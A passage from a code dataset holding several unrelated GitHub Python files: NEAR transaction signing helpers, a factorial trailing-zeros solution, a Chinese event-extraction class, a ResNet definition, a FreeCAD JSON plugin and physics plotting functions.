'fields': [\n ['nonce', 'u64'],\n ['permission', AccessKeyPermission],\n ],\n },\n AccessKeyPermission: {\n 'kind': 'enum',\n 'field': 'enum',\n 'values': [\n FunctionCallPermission,\n FullAccessPermission,\n ],\n },\n FunctionCallPermission: {\n 'kind': 'struct',\n 'fields': [\n ['allowance', {'kind': 'option', type: 'u128'}],\n ['receiver_id', 'string'],\n ['method_names', ['string']],\n ],\n },\n FullAccessPermission: {\n 'kind': 'struct',\n 'fields': [],\n },\n Action: {\n 'kind': 'enum',\n 'field': 'enum',\n 'values': [\n CreateAccount,\n DeployContract,\n FunctionCall,\n Transfer,\n Stake,\n AddKey,\n DeleteKey,\n DeleteAccount,\n ],\n },\n CreateAccount: {\n 'kind': 'struct',\n 'fields': [],\n },\n DeployContract: {\n 'kind': 'struct',\n 'fields': [\n ['code', ['u8']],\n ],\n },\n FunctionCall: {\n 'kind': 'struct',\n 'fields': [\n ['method_name', 'string'],\n ['args', ['u8']],\n ['gas', 'u64'],\n ['deposit', 'u128'],\n ],\n },\n Transfer: {\n 'kind': 'struct',\n 'fields': [\n ['deposit', 'u128'],\n ],\n },\n Stake: {\n 'kind': 'struct',\n 'fields': [\n ['stake', 'u128'],\n ['public_key', PublicKey],\n ],\n },\n AddKey: {\n 'kind': 'struct',\n 'fields': [\n ['public_key', PublicKey],\n ['access_key', AccessKey],\n ],\n },\n DeleteKey: {\n 'kind': 'struct',\n 'fields': [\n ['public_key', PublicKey],\n ],\n },\n DeleteAccount:\n {\n 'kind': 'struct',\n 'fields': [\n ['beneficiary_id', 'string'],\n ],\n },\n}\n\n\ndef sign_and_serialize_transaction(\n receiver_id: str,\n nonce: int,\n actions: list[Action],\n block_hash: bytes,\n signer: signer.Signer,\n) -> bytes:\n assert signer.public_key is not None # TODO: Need to replace to Exception\n assert block_hash is not None # TODO: Need to replace to Exception\n tx = Transaction()\n tx.signer_id = signer.account_id\n tx.public_key = PublicKey()\n tx.public_key.key_type = 0\n tx.public_key.data = signer.public_key\n tx.nonce = nonce\n tx.receiver_id = receiver_id\n tx.actions = actions\n tx.block_hash = block_hash\n\n msg: bytes = BinarySerializer(tx_schema).serialize(tx)\n hash_: bytes = hashlib.sha256(msg).digest()\n\n signature = Signature()\n signature.key_type = 0\n signature.data = signer.sign(hash_)\n\n signed_tx = SignedTransaction()\n signed_tx.transaction = tx\n signed_tx.signature = signature\n\n return BinarySerializer(tx_schema).serialize(signed_tx)\n\n\ndef create_create_account_action() -> Action:\n create_account = CreateAccount()\n action = Action()\n action.enum = create_account\n return action\n\n\ndef create_delete_account_action(beneficiary_id: str) -> Action:\n delete_account = DeleteAccount()\n delete_account.beneficiary_id = beneficiary_id\n action = Action()\n action.enum = delete_account\n return action\n\n\ndef create_full_access_key_action(pk: bytes) -> Action:\n permission = AccessKeyPermission()\n permission.enum = FullAccessPermission()\n access_key = AccessKey()\n access_key.nonce = 0\n access_key.permission = permission\n public_key = PublicKey()\n public_key.key_type = 0\n public_key.data = pk\n add_key = AddKey()\n add_key.access_key = access_key\n add_key.public_key = public_key\n action = Action()\n action.enum = add_key\n return action\n\n\ndef create_delete_access_key_action(pk: bytes) -> Action:\n public_key = PublicKey()\n public_key.key_type = 0\n public_key.data = pk\n delete_key = DeleteKey()\n delete_key.public_key = public_key\n action = Action()\n action.enum = delete_key\n return action\n\n\ndef create_transfer_action(amount: int) -> Action:\n transfer = Transfer()\n transfer.deposit = amount\n action = Action()\n action.enum = transfer\n return action\n\n\n# TODO: deprecate usage of create_payment_action.\ncreate_payment_action = create_transfer_action\n\n\ndef create_staking_action(amount: int, pk: bytes) -> Action:\n stake = Stake()\n stake.stake = amount\n stake.public_key = PublicKey()\n stake.public_key.key_type = 0\n stake.public_key.data = pk\n action = Action()\n action.enum = stake\n return action\n\n\ndef create_deploy_contract_action(code: bytes) -> Action:\n deploy_contract = DeployContract()\n deploy_contract.code = code\n action = Action()\n action.enum = deploy_contract\n return action\n\n\ndef create_function_call_action(method_name: str, args: bytes, gas: int, deposit: int) -> Action:\n function_call = FunctionCall()\n function_call.method_name = method_name\n function_call.args = args\n function_call.gas = gas\n function_call.deposit = deposit\n action = Action()\n action.enum = function_call\n return action\n\n\ndef sign_create_account_tx(\n creator_signer: signer.Signer,\n new_account_id: str,\n nonce: int,\n block_hash: bytes,\n) -> bytes:\n action = create_create_account_action()\n return sign_and_serialize_transaction(new_account_id, nonce, [action], block_hash, creator_signer)\n\n\ndef sign_create_account_with_full_access_key_and_balance_tx(\n signer: signer.Signer,\n new_account_id: str,\n public_key: bytes,\n balance: int,\n nonce: int,\n block_hash: bytes,\n) -> bytes:\n create_account_action = create_create_account_action()\n full_access_key_action = create_full_access_key_action(public_key)\n payment_action = create_transfer_action(balance)\n actions = [create_account_action, full_access_key_action, payment_action]\n return sign_and_serialize_transaction(new_account_id, nonce, actions, block_hash, signer)\n\n\ndef sign_delete_access_key_tx(\n signer: signer.Signer,\n target_account_id: str,\n key_for_deletion: bytes,\n nonce: int,\n block_hash: bytes,\n) -> bytes:\n action = create_delete_access_key_action(key_for_deletion)\n return sign_and_serialize_transaction(target_account_id, nonce, [action], block_hash, signer)\n\n\ndef sign_payment_tx(\n signer: signer.Signer,\n receiver_id: str,\n amount: int,\n nonce: int,\n block_hash: bytes,\n) -> bytes:\n action = create_transfer_action(amount)\n return sign_and_serialize_transaction(receiver_id, nonce, [action], block_hash, signer)\n\n\ndef sign_staking_tx(\n signer: signer.Signer,\n validator_key: bytes,\n amount: int,\n nonce: int,\n block_hash: bytes,\n) -> bytes:\n action = create_staking_action(amount, validator_key)\n return sign_and_serialize_transaction(signer.account_id, nonce, [action], block_hash, signer)\n\n\ndef sign_deploy_contract_tx(\n signer: signer.Signer,\n code: bytes,\n nonce: int,\n block_hash: bytes,\n) -> bytes:\n action = create_deploy_contract_action(code)\n return sign_and_serialize_transaction(signer.account_id, nonce, [action], block_hash, signer)\n\n\ndef sign_function_call_tx(\n signer: signer.Signer,\n contract_id: str,\n method_name: str,\n args: bytes,\n gas: int,\n deposit: int,\n nonce: int,\n block_hash: bytes,\n) -> bytes:\n action = create_function_call_action(method_name, args, gas, deposit)\n return sign_and_serialize_transaction(contract_id, nonce, [action], block_hash, signer)\n","repo_name":"MAKMED1337/lp3","sub_path":"near/transactions.py","file_name":"transactions.py","file_ext":"py","file_size_in_byte":9892,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"27779101040","text":"import sys\nsys.stdin = open(\"input.txt\")\n\n\ndef find(n):\n powOf5 = 5\n ans = 0\n while powOf5 <= n:\n ans += n // powOf5\n powOf5 *= 5\n print(ans)\n\n\ndef solve():\n t = int(input())\n for _ in range(t):\n n = int(input())\n find(n)\n\n\nsolve()\n","repo_name":"live-abhishek/ds-algo","sub_path":"codechef/practice/fctrl.py","file_name":"fctrl.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"2562172169","text":"''' 事件抽取 '''\n# usage: import\n# author: luohuagang\n# version: 0.0.1\n# init: 6/25/2019\n# last: 7/10/2019\n\nimport re\nimport settings\n\n\nclass EventExtraction():\n ''' 事件提取类\n '''\n def __init__(self, context, nlp):\n # 初始化事件字典,包含触发词,事件类型\n # 时间,地点,救援组织,事故原因,事故损失\n self.nlp_result = nlp.ner_result\n self.news = context\n self.event = {}\n\n self.having_event()\n\n if self.event['触发词'] in settings.FIRE_TRIGGER:\n self.fire_event()\n elif self.event['触发词'] == '警示函':\n self.finance_punishment()\n elif self.event['触发词'] == '裁员':\n self.finance_loyaffs()\n elif self.event['触发词'] == '发行股份':\n self.finance_lssuing()\n\n def fire_event(self):\n ''' 火灾事件\n '''\n # 提取时间、地点、救援组织\n self.event['火灾时间'] = self.taking_time()[0]\n self.event['火灾地点'] = self.taking_location()\n self.event['救援组织'] = self.taking_organization()\n # 匹配事故原因和事故损失\n self.cause = pattern_match(pattern_cause(), self.news)\n self.lose = pattern_match(pattern_lose(), self.news)\n self.event['火灾原因'] = \"\".join(self.cause)\n self.event['伤亡损失'] = self.lose\n\n def finance_loyaffs(self):\n ''' 裁员事件\n '''\n event_time = self.taking_time()\n if event_time:\n self.event['时间'] = event_time[0]\n self.event['裁员组织'] = self.taking_organization()\n self.event['裁员人数'] = self.taking_number()\n\n def finance_punishment(self):\n ''' 处罚事件\n '''\n event_time = self.taking_time()\n if event_time:\n self.event['时间'] = event_time[0]\n organizations = self.taking_organization()\n if organizations:\n self.event['监管组织'] = []\n self.event['受罚组织'] = []\n for organization in organizations:\n if re.search(re.compile(r\"证监会\"), organization):\n self.event['监管组织'].append(organization)\n elif re.search(re.compile(r\"证监局\"), organization):\n self.event['监管组织'].append(organization)\n else:\n self.event['受罚组织'].append(organization)\n\n def finance_lssuing(self):\n ''' 发行股票事件\n '''\n event_time = self.taking_time()\n if event_time:\n self.event['时间'] = event_time[0]\n self.event['发行组织'] = self.taking_organization()\n numbers = self.taking_number()\n for number in numbers:\n if re.search(r\"[\\d.]*?万\", number):\n self.event['发行量'] = number\n if re.search(r\"[\\d.]*?元\", number):\n self.event['发行价格'] = number\n number = re.search(r\"([\\d万]+?股)\", self.news)\n if number:\n self.event['发行量'] = number[0]\n\n def having_event(self):\n ''' 获取事件\n '''\n for item in self.nlp_result:\n if item[1] == 'CAUSE_OF_DEATH':\n if item[0] in settings.FIRE_TRIGGER:\n self.event['触发词'] = item[0]\n self.event['事件'] = settings.FIRE_TRIGGER[item[0]]\n return\n\n finance_trigger = [key for key in settings.FINANCE_TRIGGER]\n re_pattern = re.compile(r\"({})\".format('|'.join(finance_trigger)))\n match_list = re.findall(re_pattern, self.news)\n if match_list:\n self.event['触发词'] = match_list[0]\n self.event['事件'] = settings.FINANCE_TRIGGER[match_list[0]]\n return\n\n # 未发现触发词\n self.event['事件'] = None\n self.event['触发词'] = None\n\n def taking_number(self):\n ''' 获取数目\n '''\n i = 0\n state = False\n having_time = False\n only_number = True\n number = \"\"\n result = []\n while i < len(self.nlp_result):\n if self.nlp_result[i][1] in ['DATE', 'TIME']:\n having_time = True\n elif self.nlp_result[i][1] in ['NUMBER']:\n number += self.nlp_result[i][0]\n state = True\n elif self.nlp_result[i][1] in ['PERCENT', 'MONEY']:\n number += self.nlp_result[i][0]\n state = True\n only_number = False\n elif self.nlp_result[i][1] == 'MISC':\n number += self.nlp_result[i][0]\n only_number = False\n else:\n if state and not having_time and not only_number:\n result.append(number)\n number = \"\"\n state = False\n having_time = False\n only_number = True\n i += 1\n if state and not having_time and not only_number:\n result.append(number)\n\n result = list(set(result))\n return result\n\n def taking_time(self):\n ''' 获取时间\n '''\n i = 0\n state = False\n time_fire = \"\"\n result = []\n while i < len(self.nlp_result):\n if self.nlp_result[i][1] in ['DATE', 'TIME']:\n time_fire += self.nlp_result[i][0]\n state = True\n elif self.nlp_result[i][1] in ['NUMBER', 'MISC']:\n time_fire += self.nlp_result[i][0]\n else:\n if state:\n result.append(time_fire)\n time_fire = \"\"\n state = False\n i += 1\n if state:\n result.append(time_fire)\n\n return result\n\n\n def taking_location(self):\n ''' 获取地点\n '''\n i = 0\n state = False\n location = \"\"\n result = []\n while i < len(self.nlp_result):\n if (self.nlp_result[i][1] == 'LOCATION' or\n self.nlp_result[i][1] == 'FACILITY' or\n self.nlp_result[i][1] == 'CITY'):\n location += self.nlp_result[i][0]\n if not state:\n state = True\n else:\n if state:\n result.append(location)\n location = \"\"\n state = False\n i += 1\n if state:\n result.append(location)\n\n result = list(set(result))\n\n return result\n\n\n def taking_organization(self):\n ''' 获取组织\n '''\n i = 0\n state = False\n organization = \"\"\n result = []\n while i < len(self.nlp_result):\n if self.nlp_result[i][1] in settings.ORG:\n organization += self.nlp_result[i][0]\n if not state:\n state = True\n else:\n if state:\n result.append(organization)\n organization = \"\"\n state = False\n i += 1\n if state:\n result.append(organization)\n\n result = list(set(result))\n\n return result\n\n\ndef pattern_match(patterns, text):\n ''' 匹配给定模板,返回匹配列表\n '''\n result = []\n\n for pattern in patterns:\n match_list = re.findall(pattern, text)\n if match_list:\n result.append(match_list[0])\n return result\n\n\ndef pattern_cause():\n ''' 事故原因提取模板\n '''\n patterns = []\n\n key_words = ['起火', '事故', '火灾']\n pattern = re.compile('.*?(?:{0})原因(.*?)[,.?:;!,。?:;!]'.format('|'.join(key_words)))\n patterns.append(pattern)\n\n return patterns\n\n\ndef pattern_lose():\n ''' 定义损失模板\n '''\n patterns = []\n\n key_words = ['伤亡', '损失']\n pattern = re.compile('.*?(未造成.*?(?:{0}))[,.?:;!,。?:;]'.format('|'.join(key_words)))\n patterns.append(pattern)\n\n patterns.append(re.compile(r'(\\d+人死亡)'))\n patterns.append(re.compile(r'(\\d+人身亡)'))\n patterns.append(re.compile(r'(\\d+人受伤)'))\n patterns.append(re.compile(r'(\\d+人烧伤)'))\n patterns.append(re.compile(r'(\\d+人坠楼身亡)'))\n patterns.append(re.compile(r'(\\d+人遇难)'))\n\n return patterns\n\n\nif __name__ == '__main__':\n pass\n","repo_name":"jialin666/EventExtraction","sub_path":"event_extraction.py","file_name":"event_extraction.py","file_ext":"py","file_size_in_byte":8403,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"36"} +{"seq_id":"6400487437","text":"import torch.nn as nn\nfrom torch import rand\nfrom torch.hub import load_state_dict_from_url\nfrom .blocks import *\nimport torchvision\nfrom .blocks import *\n\ndef conv3x3(in_planes, out_planes, stride=1, groups=1, dilation=1):\n \"\"\"3x3 convolution with padding\"\"\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,\n padding=dilation, groups=groups, bias=False, dilation=dilation)\n\n\ndef conv1x1(in_planes, out_planes, stride=1):\n \"\"\"1x1 convolution\"\"\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)\n\nclass ResNet(nn.Module):\n\n def __init__(self, block, choose, layers, num_classes=1000, zero_init_residual=False,\n groups=1, width_per_group=64, replace_stride_with_dilation=None,\n norm_layer=None):\n super(ResNet, self).__init__()\n if norm_layer is None:\n norm_layer = nn.BatchNorm2d\n self._norm_layer = norm_layer\n\n self.inplanes = 64\n self.dilation = 1\n if replace_stride_with_dilation is None:\n # each element in the tuple indicates if we should replace\n # the 2x2 stride with a dilated convolution instead\n replace_stride_with_dilation = [False, False, False]\n if len(replace_stride_with_dilation) != 3:\n raise ValueError(\"replace_stride_with_dilation should be None \"\n \"or a 3-element tuple, got {}\".format(replace_stride_with_dilation))\n self.groups = groups\n self.base_width = width_per_group\n self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=7, stride=2, padding=3,\n bias=False)\n self.bn1 = norm_layer(self.inplanes)\n self.relu = nn.ReLU(inplace=True)\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n self.layer1 = self._make_layer(block[choose[0]], 64, layers[0])\n self.layer2 = self._make_layer(block[choose[1]], 128, layers[1], stride=2,\n dilate=replace_stride_with_dilation[0])\n self.layer3 = self._make_layer(block[choose[2]], 256, layers[2], stride=2,\n dilate=replace_stride_with_dilation[1])\n self.layer4 = self._make_layer(block[choose[3]], 512, layers[3], stride=2,\n dilate=replace_stride_with_dilation[2])\n self.avgpool = nn.AdaptiveAvgPool2d((1, 1))\n self.fc = nn.Linear(512 * block[0].expansion, num_classes)\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n # Zero-initialize the last BN in each residual branch,\n # so that the residual branch starts with zeros, and each residual block behaves like an identity.\n # This improves the model by 0.2~0.3% according to https://arxiv.org/abs/1706.02677\n if zero_init_residual:\n for m in self.modules():\n if isinstance(m, Bottleneck):\n nn.init.constant_(m.bn3.weight, 0)\n elif isinstance(m, BasicBlock):\n nn.init.constant_(m.bn2.weight, 0)\n\n def _make_layer(self, block, planes, blocks, stride=1, dilate=False):\n norm_layer = self._norm_layer\n downsample = None\n previous_dilation = self.dilation\n if dilate:\n self.dilation *= stride\n stride = 1\n if stride != 1 or self.inplanes != planes * block.expansion:\n downsample = nn.Sequential(\n conv1x1(self.inplanes, planes * block.expansion, stride),\n norm_layer(planes * block.expansion),\n )\n\n layers = []\n layers.append(block(self.inplanes, planes, stride, downsample, self.groups,\n self.base_width, previous_dilation, norm_layer))\n self.inplanes = planes * block.expansion\n for _ in range(1, blocks):\n layers.append(block(self.inplanes, planes, groups=self.groups,\n base_width=self.base_width, dilation=self.dilation,\n norm_layer=norm_layer))\n\n return nn.Sequential(*layers)\n\n def _forward_impl(self, x):\n # See note [TorchScript super()]\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n x = self.maxpool(x)\n\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n x = self.layer4(x)\n\n x = self.avgpool(x)\n x = torch.flatten(x, 1)\n x = self.fc(x)\n\n return x\n\n def forward(self, x):\n return self._forward_impl(x)\n\n\ndef _resnet(arch, block, layers, pretrained, progress, **kwargs):\n model = ResNet(block, layers, **kwargs)\n if pretrained:\n state_dict = load_state_dict_from_url(model_urls[arch],\n progress=progress)\n model.load_state_dict(state_dict)\n return model\n\n\n\nfrom thop import profile\ndef resnet18(Block=[], choose=[0,0,0,0], num_classes=1_000, groups=1):\n \"\"\"Constructs a ResNet-18 model.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n \"\"\"\n model = ResNet(Block, choose=choose, layers=[2,2,2,2], num_classes=num_classes, groups=groups)\n model.avgpool = nn.AdaptiveAvgPool2d(1)\n return model\n\n\ndef resnet34(SEBasicBlock, num_classes=1_000, groups=1):\n \"\"\"Constructs a ResNet-34 model.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n \"\"\"\n model = ResNet(SEBasicBlock, [3, 4, 6, 3], num_classes=num_classes, groups=groups)\n model.avgpool = nn.AdaptiveAvgPool2d(1)\n return model\n\n\ndef resnet50(SEBottleneck, num_classes=1_000, groups=1):\n \"\"\"Constructs a ResNet-50 model.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n \"\"\"\n model = ResNet(SEBottleneck, [3, 4, 6, 3], num_classes=num_classes, groups=groups)\n model.avgpool = nn.AdaptiveAvgPool2d(1)\n\n return model\n\n\ndef resnet101(SEBottleneck, num_classes=1_000, groups=1):\n \"\"\"Constructs a ResNet-101 model.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n \"\"\"\n model = ResNet(SEBottleneck, [3, 4, 23, 3], num_classes=num_classes, groups=groups)\n model.avgpool = nn.AdaptiveAvgPool2d(1)\n return model\n\n\ndef resnet152(SEBottleneck, num_classes=1_000, groups=1):\n \"\"\"Constructs a ResNet-152 model.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n \"\"\"\n model = ResNet(SEBottleneck, [3, 8, 36, 3], num_classes=num_classes, groups=groups)\n model.avgpool = nn.AdaptiveAvgPool2d(1)\n return model\n\n\n\nif __name__==\"__main__\":\n x = rand((1,3,224,224))\n # net = torchvision.models.resnet18()\n # flops, params = profile(net, inputs=(x,))\n # # summary(resnet, input_size=(3, 224, 224), batch_size=-1, device=\"cpu\")\n # print(params / 1000 / 1000)\n # print(flops / 1000 / 1000 / 1000)\n #\n #\n #\n # net = resnet18(SKBasicBlock, 3)\n # flops, params = profile(net, inputs=(x,))\n # # summary(resnet, input_size=(3, 224, 224), batch_size=-1, device=\"cpu\")\n # print(params / 1000 / 1000)\n # print(flops / 1000 / 1000 / 1000)\n # net = resnet18(SEBasicBlock, 3)\n #\n # flops, params = profile(net, inputs=(x,))\n # # summary(resnet, input_size=(3, 224, 224), batch_size=-1, device=\"cpu\")\n # print(params / 1000 / 1000)\n # print(flops / 1000 / 1000 / 1000)\n net = resnet18(BasicBlock, 3, groups=32)\n print(net(x).shape)\n flops, params = profile(net, inputs=(x,))\n # summary(resnet, input_size=(3, 224, 224), batch_size=-1, device=\"cpu\")\n print(params / 1000 / 1000)\n print(flops / 1000 / 1000 / 1000)\n net = resnet18(Bottleneck, 3, groups=32)\n print(net(x).shape)\n flops, params = profile(net, inputs=(x,))\n # summary(resnet, input_size=(3, 224, 224), batch_size=-1, device=\"cpu\")\n print(params / 1000 / 1000)\n print(flops / 1000 / 1000 / 1000)","repo_name":"TommyLitlle/LCRNet","sub_path":"models/resnet_by_layer.py","file_name":"resnet_by_layer.py","file_ext":"py","file_size_in_byte":8254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"8639689173","text":"import FreeCAD\nfrom plugin.plugin_loader import register_plugin\nfrom plugin.plugin import Plugin\n\nLog = FreeCAD.Console.PrintMessage\n\n\n@Plugin.register\nclass VirSatFilePlugin(Plugin):\n '''\n Legacy Plugin that directly im-/exports a JSON file\n '''\n def importToDict(self, project_directory):\n from PySide2.QtWidgets import QFileDialog\n import json\n\n # call pyqt dialog: returns (filename, filter)\n filename = QFileDialog.getOpenFileName(\n None, # ui parent\n \"Open JSON file\", # dialog caption\n project_directory,\n \"JSON(*.json)\")[0]\n\n if filename != '':\n (f\"Selected file '{filename}'\\n\")\n\n with open(filename, 'r') as f:\n try:\n return json.load(f)\n except ValueError as error:\n Log(f\"ERROR: Invalid JSON found: '{error}'\\n\")\n Log(\"Please provide a valid JSON\\n\")\n return\n\n def exportFromDict(self, data_dict, project_directory):\n from PySide2.QtWidgets import QFileDialog\n import json\n\n # call pyqt dialog: returns (filename, filter)\n filename = QFileDialog.getSaveFileName(\n None, # ui parent\n \"Save JSON file\", # dialog caption\n project_directory,\n \"JSON(*.json)\")[0]\n if filename != '':\n json_str = json.dumps(data_dict)\n\n with open(filename, 'w') as file:\n file.write(json_str)\n\n\nregister_plugin(VirSatFilePlugin(\"Virtual Satellite File Plugin (Legacy)\", \"VirtualSatelliteFilePlugin\", False))\n","repo_name":"virtualsatellite/VirtualSatellite4-FreeCAD-mod","sub_path":"VirtualSatelliteCAD/plugins/VirtualSatelliteFilePlugin/init_plugin.py","file_name":"init_plugin.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"36"} +{"seq_id":"73609826025","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nfrom cued.utility import ConversionFactors as co\n\n\ndef time_grid(time, kpath, electric_field, current, band_structure,\n density_center, standard_deviation, e_fermi=0.2,\n electric_field_legend=None, current_legend=None,\n band_structure_legend=None, density_center_legend=None,\n standard_deviation_legend=None, timelim=None, energylim=None,\n bzboundary=None, savename=None, si_units=True):\n\n if (si_units):\n time *= co.au_to_fs\n kpath /= co.au_to_as\n electric_field *= co.au_to_MVpcm\n current *= co.au_to_Amp\n band_structure *= co.au_to_eV\n density_center /= co.au_to_as\n standard_deviation /= co.au_to_as\n else:\n e_fermi *= co.eV_to_au\n\n ########################################\n # Electric field\n ########################################\n ax1 = plt.subplot2grid((2, 6), (0, 0), colspan=3)\n ax1.plot(time, electric_field.T)\n if (si_units):\n ax1.set_xlabel(r'$t \\text{ in } \\si{fs}$')\n ax1.set_ylabel(r'$E \\text{ in } \\si{MV/cm}$')\n else:\n ax1.set_xlabel(r'$t \\text{ in atomic units}$')\n ax1.set_ylabel(r'$E \\text{ in atomic units}$')\n\n ax1.set_title(r'Electric Field')\n ax1.grid(which='major', axis='x', linestyle='--')\n if (electric_field_legend is not None):\n ax1.legend(electric_field_legend)\n\n ########################################\n # Current\n ########################################\n ax2 = plt.subplot2grid((2, 6), (0, 3), colspan=3)\n ax2.plot(time, current.T)\n if (si_units):\n ax2.set_xlabel(r'$t \\text{ in } \\si{fs}$')\n ax2.set_ylabel(r'$j \\text{ in } \\si{A}$')\n else:\n ax2.set_xlabel(r'$t \\text{ in atomic units}$')\n ax2.set_ylabel(r'$j \\text{ in atomic units}$')\n ax2.yaxis.set_label_position(\"right\")\n ax2.yaxis.tick_right()\n\n ax2.set_title(r'Current Density')\n ax2.grid(which='major', axis='x', linestyle='--')\n ax2.axhline(y=0, linestyle='--', color='grey')\n if (current_legend is not None):\n ax2.legend(current_legend)\n\n ########################################\n # Band structure\n ########################################\n kpath_min = np.min(density_center)\n kpath_max = np.max(density_center)\n ax3 = plt.subplot2grid((2, 6), (1, 0), colspan=2)\n # Number of band structures to plot\n band_num = np.size(band_structure, axis=0)\n ax3.plot(band_structure.T, np.tile(kpath, (band_num, 1)).T)\n if (si_units):\n ax3.set_xlabel(r'$\\epsilon \\text{ in } \\si{eV}$')\n ax3.set_ylabel(r'$k \\text{ in } \\si{1/\\angstrom}$')\n else:\n ax3.set_xlabel(r'$\\epsilon \\text{ in atomic units}$')\n ax3.set_ylabel(r'$k \\text{ in atomic units}$')\n if (energylim is not None):\n ax3.set_xlim(energylim)\n ax3.axvline(x=e_fermi, linestyle=':', color='black')\n ax3.set_ylim(-kpath_max*1.05, kpath_max*1.05)\n ax3.axhline(y=kpath_min, linestyle='--', color='grey')\n ax3.axhline(y=0, linestyle='--', color='grey')\n ax3.axhline(y=kpath_max, linestyle='--', color='grey')\n\n ax3.set_title(r'Band Structure')\n if (band_structure_legend is not None):\n ax3.legend(band_structure_legend)\n\n ########################################\n # Density data\n ########################################\n ax4 = plt.subplot2grid((2, 6), (1, 2), colspan=2, sharey=ax3)\n ax4.plot(time, density_center[:-1].T)\n ax4.plot(time, density_center[-1], linestyle=':', color='red')\n if (si_units):\n ax4.set_xlabel(r'$t \\text{ in } \\si{fs}$')\n else:\n ax4.set_xlabel(r'$t \\text{ in atomic units}$')\n ax4.set_title(r'Density Center of Mass')\n ax4.grid(which='major', axis='x', linestyle='--')\n ax4.axhline(y=kpath_min, linestyle='--', color='grey')\n ax4.axhline(y=0, linestyle='--', color='grey')\n ax4.axhline(y=kpath_max, linestyle='--', color='grey')\n plt.setp(ax4.get_yticklabels(), visible=False)\n if (density_center_legend is not None):\n ax4.legend(density_center_legend)\n\n ax5 = plt.subplot2grid((2, 6), (1, 4), colspan=2)\n ax5.set_title(r'Density Standard Deviation')\n ax5.plot(time, standard_deviation.T)\n ax5.yaxis.set_label_position(\"right\")\n ax5.yaxis.tick_right()\n if (si_units):\n ax5.set_xlabel(r'$t \\text{ in } \\si{fs}$')\n ax5.set_ylabel(r'$\\sigma \\text{ in } \\si{1/\\angstrom}$')\n else:\n ax5.set_xlabel(r'$t \\text{ in atomic units}$')\n ax5.set_ylabel(r'$\\sigma \\text{ in atomic units}$')\n\n if (standard_deviation_legend is not None):\n ax5.legend(standard_deviation_legend)\n\n if (timelim is not None):\n ax1.set_xlim(timelim)\n ax2.set_xlim(timelim)\n ax4.set_xlim(timelim)\n ax5.set_xlim(timelim)\n\n if (bzboundary is not None):\n ax3.set_title(r'Band Structure $k_\\mathrm{BZ}='\n + '{:.3f}'.format(bzboundary) + r'[\\si{1/\\angstrom}]$')\n ax3.axhline(y=bzboundary, linestyle=':', color='green')\n ax3.axhline(y=-bzboundary, linestyle=':', color='green')\n ax4.axhline(y=bzboundary, linestyle=':', color='green')\n ax4.axhline(y=-bzboundary, linestyle=':', color='green')\n\n plt.tight_layout()\n if (savename is not None):\n plt.savefig(savename)\n else:\n plt.show()\n\n\ndef time_dir_ortho_angle(time, current_dir, current_ortho, current_legend=None,\n savename=None, si_units=True):\n\n if si_units:\n time *= co.au_to_fs\n current_dir *= co.au_to_Amp\n current_ortho *= co.au_to_Amp\n\n time = time.real\n current_dir = current_dir.real\n current_ortho = current_ortho.real\n\n _fig, ax = plt.subplots(2)\n ax[0].plot(time, current_dir.T, marker='.')\n ax[0].plot(time, current_ortho.T, linestyle='--')\n\n angle_data = np.arctan(current_ortho/current_dir)\n ax[1].plot(time, angle_data.T)\n\n if savename is None:\n plt.show()\n else:\n plt.savefig(savename)\n\n\ndef time_dir_ortho(time, current_dir, current_ortho, xlim=None, ylim=None,\n xlabel=r'Time in atomic units', ylabel=r'Current in atomic units',\n marker=None, paramlegend=None, supertitle=None, title=None, savename=None,\n si_units=True):\n\n time = time.real\n current_dir = current_dir.real\n current_ortho = current_ortho.real\n\n if si_units:\n time *= co.au_to_fs\n current_dir *= co.au_to_Amp*1e5\n current_ortho *= co.au_to_Amp*1e5\n xlabel = r'Time in fs'\n ylabel = r'Current in $\\si{\\mu A}$'\n\n _fig, ax = plt.subplots(1)\n for t, c_dir, c_ort in zip(time, current_dir, current_ortho):\n _lines_dir = ax.plot(t, c_dir, marker=marker)\n # _lines_ortho = ax.plot(t, c_ort, linestyle='--', marker=marker)\n plt.gca().set_prop_cycle(None)\n # _lines_ortho = ax.plot(time.T, current_ortho.T, linestyle='--', marker=marker)\n\n ax.grid(True, axis='x', ls='--')\n ax.set_xlabel(xlabel)\n ax.set_ylabel(ylabel)\n\n if xlim is not None:\n ax.set_xlim(xlim)\n\n if ylim is not None:\n ax.set_ylim(ylim)\n\n if paramlegend is not None:\n ax.legend(paramlegend)\n\n if supertitle is not None:\n plt.suptitle(supertitle)\n\n if title is not None:\n ax.set_title(title)\n\n if savename is not None:\n plt.savefig(savename)\n else:\n plt.show()\n","repo_name":"ccmt-regensburg/CUED","sub_path":"cued/plotting/time_plots.py","file_name":"time_plots.py","file_ext":"py","file_size_in_byte":7428,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"36"} +{"seq_id":"30867218191","text":"'''\r\nAuthor: Jason Brown\r\nStudent ID: 469730808\r\nDate: 11/09/22\r\n'''\r\n\r\n''' This program will combine functions created in task 1 and task 2 to produce caesar cipher code in one command line 